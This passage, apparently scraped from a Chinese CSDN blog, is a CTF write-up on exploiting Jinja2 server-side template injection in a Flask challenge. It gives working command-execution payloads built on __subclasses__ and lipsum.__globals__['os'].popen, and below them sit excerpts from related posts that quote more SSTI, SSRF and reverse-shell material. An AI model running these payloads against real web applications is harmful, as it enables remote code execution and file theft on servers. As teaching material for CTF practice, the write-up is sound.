'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'http.cookiejar.Cookie'>, <class 'http.cookiejar.CookiePolicy'>, <class 'http.cookiejar.Absent'>, <class 'http.cookiejar.CookieJar'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'uuid.UUID'>, <class 'itsdangerous._json._CompactJSON'>, <class 'hmac.HMAC'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask._compat._DeprecatedBool'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>, <class 'dataclasses._MISSING_TYPE'>, <class 'dataclasses._FIELD_BASE'>, <class 'dataclasses.InitVar'>, <class 'dataclasses.Field'>, <class 'dataclasses._DataclassParams'>, <class 'difflib.SequenceMatcher'>, <class 'difflib.Differ'>, <class 'difflib.HtmlDiff'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'werkzeug.wrappers.json._JSONModule'>, <class 'werkzeug.wrappers.json.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>"
all_list = all_list.split(', ')
for i in range(len(all_list)):
	if 'os' in all_list[i]:
		print('{} {}'.format(i, all_list[i]))

{{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

看到flag.txt 然后 cat flag.txt 获得flag ,没有任何的过滤

二个方法都可以  lipsum

接下来直接利用flask的一个方法:lipsum

可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}

然后构建payload:/?name={{lipsum.__globals__['os'].popen('ls').read()}}
 

偶尔躲躲乌云334
关注
【学习笔记12】buu [De1CTF 2019]SSRF Me
weixin_43553654的博客
05-12 359
打开后看到一堆代码,根本看不懂,不过还好题目上给出了源码的下载位置,并且提示flag is in ./flag.txt,那啥都都不说了,先把源码下载下来吧。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashl...
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3274
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
SSTI了解+反序列化了解+SSRF了解+之前的一些题
qq_61109509的博客
03-06 889
文章目录SSTI简介web361web362SSTI 命令执行的一些总结 SSTI简介 SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题,与sql注入类似 web361 名字就是考点 ?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
BUU BJDCTF fake google(ssti模板注入) write up 随便学习模板注入
tothemoon的博客
03-31 533
发现提示!,模板注入无疑了 验证一下 寻找object基类 "".__class__.__bases__ 或 "".__class__.__mro__ 找到os方法 "".__class__.__mro__[1].__subclasses__()[117] 用.init.globals查找os,init初始化类,globals全局查找方法变量参数 "".__class__._...
SSI注入实战
qq_23347209的博客
05-28 1264
文章目录靶机环境一、服务器信息搜集二、网站信息搜集1.使用nikto扫描网站目录2.浏览网站三、SSI注入漏洞利用1、SSI注入简介:2、SSI注入测试网站四、利用nc反弹shell——失败五、使用msf框架1、python木马生成2、建立木马监听端3、上传木马文件到本地web服务器上4、构造SSI注入语句执行木马 靶机环境 靶机下载网站:https://www.vulnhub.com/ 使用Vmware虚拟机中NAT网络 靶机 192.168.146.150 攻击机 parrot 192.168.14
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1198
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
buu ctf web进阶]ssti
08-23
- *1* *2* *3* [(wp)ctfweb-buussti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
[初级]sql注入BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3853
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
ssti
2h4ox1n9
05-23 955
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
关于SSI注入(server side includes injection 服务器端包含注入
weixin_30443813的博客
04-14 260
0x01 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执行shell和CGI脚本程序等复杂的功能。SSI 可以称得上是...
Garud:自动化工具可以扫描子域,子域接管,然后过滤掉XSS,SSTISSRF和更多注入点参数,并自动扫描一些低悬空漏洞
03-21
加鲁德 一种自动化工具,可以扫描子域,子域接管,然后过滤出xss,sstissrf和更多注入点参数。 要求: Go语言,Python 2.7或Python 3。 系统要求:建议在具有1VCPU和2GB内存的vps上运行。 使用的工具-您必须安装这些工具才能使用此脚本 安装-安装工具之前,请先确保您是root用户 git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud install.sh && mv garud /usr/bin/ && ./install.sh 用法 █▀▀ ▄▀█ █▀█ █░█ █▀▄ █▄█ █▀█ █▀▄ █▄█ █▄▀ coded by R0X4R with <3 Usage : -d target you want to scan (target. c
bWAPP----Server-Side Includes (SSI) Injection
weixin_30556959的博客
07-20 239
Server-Side Includes (SSI) Injection 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执...
ssrf刷题——buu [第二章 web进阶]SSRF Training [网鼎杯 2020 玄武组]SSRFMe
最新发布
m0_73756016的博客
05-28 1537
需要用到的工具。
[BUU/SSRF] [De1CTF 2019]SSRF Me
車鈊的博客
10-14 301
[De1CTF 2019]SSRF Me 初审 整理源代码 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json # reload(sys) # sys.setdefaultencoding('latin1') app = Fla
BUU [第二章 web进阶]SSRF Training
qq_62078839的博客
04-18 1898
打开连接发现页面上提示了flag.php,那么flag应该就放在这里了,点开intersting challenge 出现源码,审计代码 <?php highlight_file(__FILE__); function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { ...
ssi(Server Side Includes)介绍
05-27 199
Server Side Includes(SSI) is a simple interpretedserver-side scriptinglanguage used almost exclusively for theWeb. The most frequent use of SSI is to include the contents of one or more file...
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2652
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
BUUCTF WEB SSRF(下)(FastCGI协议)
wwwwyyyrre的博客
04-18 266
index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对)我这里提供的是第二种方法 提供一个php文件的绝对路径 在看他的根目录 找到flag的文件 在进行读取。这里的php文件的绝对路径我用的是var/www/html/index.php。PHP-FPM监听在本机9000端口(题目环境已满足)知道题目环境中的一个PHP文件的绝对路径。
[WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析
車鈊的博客
07-31 268
[网鼎杯 2018]Fakebook 扫描测试,robots.txt 可读 User-agent: * Disallow: /user.php.bak 下载,源代码展示了UserInfo类, <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值